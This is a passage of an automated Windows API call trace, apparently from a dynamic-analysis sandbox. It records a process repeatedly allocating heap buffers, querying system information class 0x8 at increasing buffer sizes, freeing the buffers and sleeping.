hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0299.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0299.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0299.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.754] Sleep (dwMilliseconds=0x110) [0299.770] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0299.770] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.771] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0299.771] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0299.771] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.771] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0299.772] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0299.772] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.772] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0299.772] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0299.772] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.773] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0299.773] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.773] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.773] Sleep (dwMilliseconds=0x110) [0299.778] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0299.778] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0299.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0299.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0299.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0299.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0299.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0299.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0299.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.781] Sleep (dwMilliseconds=0x110) [0299.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0299.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0299.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0299.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0299.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0299.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0299.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0299.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0299.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.800] Sleep (dwMilliseconds=0x110) [0299.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0299.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0299.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0299.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0299.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0299.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0299.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0299.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0299.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.816] Sleep (dwMilliseconds=0x110) [0299.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0299.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0299.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0299.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0299.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0299.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0299.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0299.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0299.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.832] Sleep (dwMilliseconds=0x110) [0299.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0299.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0299.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0299.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0299.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0299.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0299.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0299.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0299.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.847] Sleep (dwMilliseconds=0x110) [0299.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0299.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0299.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0299.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0299.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0299.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0299.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0299.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0299.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.861] Sleep (dwMilliseconds=0x110) [0299.872] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0299.872] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0299.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0299.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0299.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0299.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0299.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0299.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0299.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.878] Sleep (dwMilliseconds=0x110) [0299.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0299.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0299.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0299.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0299.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0299.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0299.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0299.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0299.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.894] Sleep (dwMilliseconds=0x110) [0299.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0299.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0299.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0299.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0299.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0299.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0299.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0299.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0299.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.910] Sleep (dwMilliseconds=0x110) [0299.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0299.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0299.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0299.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0299.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0299.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0299.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0299.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0299.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.925] Sleep (dwMilliseconds=0x110) [0299.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0299.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0299.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0299.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0299.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0299.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0299.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0299.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0299.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.941] Sleep (dwMilliseconds=0x110) [0299.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0299.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0299.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0299.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0299.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0299.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0299.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0299.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0299.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.956] Sleep (dwMilliseconds=0x110) [0299.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0299.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0299.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0299.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0299.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0299.971] NtQuerySystemInformation (in: 